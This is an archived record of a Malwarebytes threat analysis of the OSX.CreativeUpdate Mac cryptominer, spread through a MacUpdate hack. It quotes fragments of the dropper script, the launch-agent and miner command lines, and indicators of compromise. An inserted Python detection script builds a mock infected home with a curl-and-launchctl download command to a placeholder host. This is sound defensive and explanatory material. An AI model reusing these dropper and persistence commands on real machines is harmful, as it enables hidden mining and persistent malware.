{
	"id": "b4493c5a-f2f6-4e95-9462-109966d31a7c",
	"created_at": "2026-04-06T01:30:54.598288Z",
	"updated_at": "2026-04-10T03:21:00.537322Z",
	"deleted_at": null,
	"sha1_hash": "c0fe6bb0fdcda26a8532095f80df13e917563cd5",
	"title": "New Mac cryptominer distributed via a MacUpdate hack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 328675,
	"plain_text": "New Mac cryptominer distributed via a MacUpdate hack\r\nBy Thomas Reed\r\nPublished: 2018-02-01 · Archived: 2026-04-06 00:49:28 UTC\r\nEarly this morning, security researcher Arnaud Abbati of SentinelOne tweeted about new Mac malware being distributed via MacUpdate. This malware, which Abbati has named OSX.CreativeUpdate, is a new cryptocurrency miner, designed to sit in the background and use your computer’s CPU to mine the Monero currency.\r\nThe malware was spread via a hack of the MacUpdate site, which was distributing maliciously modified copies of the Firefox, OnyX, and Deeper applications. According to a statement posted in the comments for each of the affected apps on the MacUpdate website, this happened sometime on February 1.\r\nhttps://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/\r\nPage 1 of 4\r\nBoth OnyX and Deeper are products made by Titanium Software (titanium-software.fr), but the MacUpdate site was changed maliciously to point to download URLs at titaniumsoftware.org, a domain first registered on January 23 and whose ownership is obscured. The fake Firefox app was distributed from download-installer.cdn-mozilla.net. (Notice that the registrable domain here is cdn-mozilla.net, a separate registration with no connection to mozilla.net; a hyphenated look-alike of this kind is a common scammer trick to make you think a download is coming from a legitimate site.)\r\nThe downloaded files are .dmg (disk image) files, and they look pretty convincing. In each case, the user is asked to drag the app into the Applications folder, just as the original, non-malicious .dmg files for those apps would.\r\nThe applications themselves were, as Abbati indicated in his tweet, created by Platypus, a developer tool that makes full macOS applications from a variety of scripts, such as shell or Python scripts. 
This means the creation of these applications had a low bar for entry.\r\nOnce the application has been installed, when the user opens it, it will download and install the payload from public.adobecc.com (a legitimate site owned by Adobe). Then, it attempts to open a copy of the original app (referred to as a decoy app, because it is used to trick the user into thinking nothing’s wrong), which is included inside the malicious app.\r\nHowever, this isn’t always successful. For example, the malicious OnyX app will run on Mac OS X 10.7 and up, but the decoy OnyX app requires macOS 10.13. This means that on any system between 10.7 and 10.12, the malware will run, but the decoy app won’t open to cover up the fact that something malicious is going on. In the case of the Deeper app, the hackers got even sloppier, including an OnyX app instead of a Deeper app as the decoy by mistake, making it fail similarly but for a more laughable reason.\r\nThe “script” file inside the app takes care of opening the decoy app, and then downloading and installing the malware.\r\nopen Deeper.app if [ -f ~/Library/mdworker/mdworker ]; then killall Deeperd else nohup curl -o ~/Lib\r\nFor those who can’t read shell scripts, this code first attempts to open the decoy Deeper.app, which will fail since the wrong decoy was included by mistake. Next, if the malware is already installed (the check is for the presence of ~/Library/mdworker/mdworker), the malicious dropper process is killed, since installation is not necessary.\r\nIf the malware is not installed, it will download the malware and unzip it into the user’s Library folder, which is hidden in macOS by default, so most users wouldn’t even know anything had been added there. 
It also installs a malicious launch agent file named MacOSupdate.plist, which repeatedly runs another script.\r\nLabel: MacOSupdate\r\nProgramArguments: sh -c launchctl unload -w ~/Library/LaunchAgents/MacOS\r\nWhen this launch agent runs, it downloads a new MacOS.plist file and installs it. Before doing so, it will remove the previous MacOS.plist file, presumably so it can be updated with new code. The version of this MacOS.plist file that we obtained did the real work.\r\nsh -c ~/Library/mdworker/sysmdworker -user walker18@protonmail.ch -xmr\r\nThis loads a malicious sysmdworker process, passing in a couple of arguments, one of which is an email address. That sysmdworker process will then do the work of mining the Monero cryptocurrency, using a command-line tool called minergate-cli, and periodically connecting to minergate.com, passing in the above email address as the login.\r\nThere are multiple takeaways from this. First and foremost, never download software from any kind of “download aggregation” site (a site that acts like an unofficial Mac App Store to let you browse for software). Such sites have a long history of issues. In the case of MacUpdate, back in 2015 they were modifying other people’s software, wrapping it in their own adware-laden installer. This is no longer happening, but in 2016, MacUpdate was similarly used to distribute the OSX.Eleanor malware.\r\nInstead, always download software directly from the developer’s site or from the Mac App Store. These are not guarantees, and can still get you infected with malware, adware, or scam software. But your odds are better. 
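For defenders, the persistence chain laid out above (the ~/Library/mdworker directory, the MacOSupdate and MacOS launch agents, and the sh -c wrapper around sysmdworker) is the part worth hunting for on other Macs. The script below is an added example written for this page, not code from the Malwarebytes post or from the malware itself. It walks one home directory for exactly the paths and labels the write-up names, and it generalises the launch agent check slightly: any LaunchAgent whose program is an sh -c wrapper mentioning curl, launchctl or the mdworker binaries is flagged, not only the two labels. The token list, the sample home it builds, the placeholder download URL http://example.invalid/MacOS.plist and the benign com.example.backup agent are all constructed here for the demonstration and are not from the article.

```python
import os
import plistlib
import tempfile
from pathlib import Path

# Added example (not from the Malwarebytes post). Paths and labels are the
# ones the article names; the token heuristic and sample data are assumptions.
FILE_INDICATORS = (
    'Library/mdworker/mdworker',               # marker the dropper script tests for
    'Library/mdworker/sysmdworker',            # wrapper that runs the Monero miner
    'Library/LaunchAgents/MacOSupdate.plist',  # agent that refreshes MacOS.plist
    'Library/LaunchAgents/MacOS.plist',        # agent that launches sysmdworker
)
LABEL_INDICATORS = {'MacOSupdate', 'MacOS'}
# Inside an sh -c command line these match the described behaviour: fetching
# with curl, reloading another agent with launchctl, running the mdworker binaries.
SUSPICIOUS_TOKENS = ('curl', 'launchctl', 'sysmdworker', 'mdworker')


def inspect_launch_agent(path):
    '''Return the reasons one LaunchAgent plist resembles the CreativeUpdate agents.'''
    reasons = []
    with open(path, 'rb') as fh:
        try:
            plist = plistlib.load(fh)
        except plistlib.InvalidFileException:
            return ['not a parseable plist']
    if not isinstance(plist, dict):
        return ['top-level object is not a dictionary']
    label = str(plist.get('Label', ''))
    if label in LABEL_INDICATORS:
        reasons.append('label %s matches a CreativeUpdate agent' % label)
    args = [str(a) for a in plist.get('ProgramArguments', [])]
    # Both malicious agents wrap the real command in sh -c, so the whole
    # command line sits in one argument where the tokens can be matched.
    if len(args) >= 3 and os.path.basename(args[0]) == 'sh' and args[1] == '-c':
        command = ' '.join(args[2:])
        hits = [tok for tok in SUSPICIOUS_TOKENS if tok in command]
        if hits:
            reasons.append('sh -c wrapper referencing %s' % ', '.join(hits))
    return reasons


def scan_home(home):
    '''Walk one home directory and return a list of human-readable findings.'''
    home = Path(home)
    findings = []
    for rel in FILE_INDICATORS:
        if (home / rel).exists():
            findings.append('indicator present: ~/%s' % rel)
    agents = home / 'Library' / 'LaunchAgents'
    if agents.is_dir():
        for plist_path in sorted(agents.glob('*.plist')):
            for reason in inspect_launch_agent(plist_path):
                findings.append('%s: %s' % (plist_path.name, reason))
    return findings


def build_sample_home(base):
    '''Lay out a constructed home directory that mimics an infected one.'''
    base = Path(base)
    mdworker = base / 'Library' / 'mdworker'
    mdworker.mkdir(parents=True)
    (mdworker / 'mdworker').write_bytes(b'')
    (mdworker / 'sysmdworker').write_bytes(b'')
    agents = base / 'Library' / 'LaunchAgents'
    agents.mkdir()
    # Updater agent modelled on the article's MacOSupdate.plist; the download
    # URL is a placeholder because the article does not show the real one.
    updater = {'Label': 'MacOSupdate', 'ProgramArguments': ['sh', '-c',
               'launchctl unload -w ~/Library/LaunchAgents/MacOS.plist; '
               'curl -o ~/Library/LaunchAgents/MacOS.plist http://example.invalid/MacOS.plist; '
               'launchctl load -w ~/Library/LaunchAgents/MacOS.plist']}
    # Miner agent using the exact command line quoted in the article.
    miner = {'Label': 'MacOS', 'ProgramArguments': ['sh', '-c',
             '~/Library/mdworker/sysmdworker -user walker18@protonmail.ch -xmr']}
    # A benign agent that must not be flagged (constructed).
    benign = {'Label': 'com.example.backup',
              'ProgramArguments': ['/usr/local/bin/backup', '--daily']}
    for name, value in (('MacOSupdate.plist', updater), ('MacOS.plist', miner),
                        ('com.example.backup.plist', benign)):
        with open(agents / name, 'wb') as fh:
            plistlib.dump(value, fh)
    return base


def demo():
    '''Build the constructed sample home in a temp dir, scan it, return the findings.'''
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_home(tmp)
        return scan_home(tmp)


if __name__ == '__main__':
    for line in demo():
        print(line)
```

Run it as-is to see the eight findings for the constructed home; on a real Mac, call scan_home on each user's home directory instead of build_sample_home. plistlib handles both XML and binary plists, so the check does not depend on grepping the XML text, and a parse failure is itself reported as a finding rather than silently skipped.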
Be sure to check around to make sure the software is legitimate before downloading, but do not give full credence to ratings or reviews on third-party sites or the Mac App Store, as those can be faked.\r\nSecond, if you have downloaded a new application and it seems not to be functioning as expected—such as not opening at all when you double-click it—be suspicious. Consider scanning your computer with security software. Malwarebytes for Mac will detect this malware as OSX.CreativeUpdater.\r\nFinally, be aware that the old adage that “Macs don’t get viruses,” which has never been true, is proven to be increasingly false. This is the third piece of Mac malware so far this year, following OSX.MaMi and OSX.CrossRAT. That doesn’t even consider the wide variety of adware and junk software out there. Do not let yourself believe that Macs don’t get infected, as that will make you more vulnerable.\r\nAbout the author\r\nHad a Mac before it was cool to have Macs. Self-trained Apple security expert. Amateur photographer.\r\nSource: https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/"
	],
	"report_names": [
		"new-mac-cryptominer-distributed-via-a-macupdate-hack"
	],
	"threat_actors": [],
	"ts_created_at": 1775439054,
	"ts_updated_at": 1775791260,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c0fe6bb0fdcda26a8532095f80df13e917563cd5.pdf",
		"text": "https://archive.orkl.eu/c0fe6bb0fdcda26a8532095f80df13e917563cd5.txt",
		"img": "https://archive.orkl.eu/c0fe6bb0fdcda26a8532095f80df13e917563cd5.jpg"
	}
}